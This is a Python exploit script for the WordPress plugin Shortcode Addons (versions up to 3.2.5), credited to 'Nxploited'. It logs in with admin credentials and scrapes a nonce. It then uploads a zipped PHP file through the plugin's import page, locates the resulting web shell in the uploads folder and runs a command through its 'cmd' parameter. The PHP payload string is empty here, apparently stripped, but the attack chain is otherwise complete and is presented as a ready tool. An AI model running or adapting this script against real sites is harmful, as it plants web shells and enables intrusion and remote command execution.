import requests from bs4 import BeautifulSoup import argparse import os import zipfile import time #Exploit By: Nxploited | Khaled Alenazi, def create_session(): requests.packages.urllib3.disable_warnings() session = requests.Session() session.verify = False return session def login(session, base_url, username, password, user_agent): login_url = base_url + '/wp-login.php' data = { 'log': username, 'pwd': password, 'rememberme': 'forever', 'wp-submit': 'Log In' } headers = {'User-Agent': user_agent} response = session.post(login_url, data=data, headers=headers) for cookie in session.cookies: if 'wordpress_logged_in' in cookie.name: print("[+] Authentication successful.") return True print("[-] Authentication failed.") return False def extract_nonce(session, import_url, user_agent): headers = {'User-Agent': user_agent} response = session.get(import_url, headers=headers) soup = BeautifulSoup(response.text, 'html.parser') nonce_input = soup.find('input', {'name': '_wpnonce'}) if nonce_input: print(f"[+] _wpnonce extracted: {nonce_input['value']}") return nonce_input['value'] print("[-] _wpnonce not found.") return None def generate_payload(zip_name, php_name): php_code = '' with open(php_name, 'w') as f: f.write(php_code) with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as zipf: zipf.write(php_name) print(f"[+] Payload {zip_name} created.") def upload_payload(session, import_url, user_agent, nonce, zip_name): files = { 'validuploaddata': (zip_name, open(zip_name, 'rb'), 'application/zip') } data = { '_wpnonce': nonce, '_wp_http_referer': '/wp-admin/admin.php?page=shortcode-addons-import', 'data-upload': 'Save' } headers = { 'User-Agent': user_agent, 'Referer': import_url } response = session.post(import_url, headers=headers, files=files, data=data) if response.status_code == 200: print("[+] Payload uploaded.") return True print("[-] Upload failed.") return False def confirm_shell(base_url): shell_url = base_url + '/wp-content/uploads/shortcode-addons/nxploit.php' time.sleep(3) response = requests.get(shell_url, verify=False) if response.status_code == 200: print(f"[+] Shell is accessible at: {shell_url}") return shell_url print("[-] Shell not found.") return None def execute_command(shell_url): cmd_url = shell_url + '?cmd=whoami' response = requests.get(cmd_url, verify=False) if response.status_code == 200: print("[+] Command output:") print("------------------") print(response.text.strip()) print("------------------") else: print("[-] Failed to execute command.") def cleanup(files): for file in files: if os.path.exists(file): os.remove(file) print("[+] Temporary files removed.") def exploit(): parser = argparse.ArgumentParser(description="Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload # By:Nxploited | Khaled Alenazi,") parser.add_argument('-u', '--url', required=True, help='Target URL') parser.add_argument('-un', '--username', required=True, help='Username') parser.add_argument('-p', '--password', required=True, help='Password') args = parser.parse_args() base_url = args.url.rstrip('/') import_url = base_url + '/wp-admin/admin.php?page=shortcode-addons-import' user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" session = create_session() if not login(session, base_url, args.username, args.password, user_agent): return nonce = extract_nonce(session, import_url, user_agent) if not nonce: return php_file = 'nxploit.php' zip_file = 'nxploit.zip' generate_payload(zip_file, php_file) if not upload_payload(session, import_url, user_agent, nonce, zip_file): cleanup([php_file, zip_file]) return shell_url = confirm_shell(base_url) if shell_url: execute_command(shell_url) cleanup([php_file, zip_file]) if __name__ == "__main__": exploit()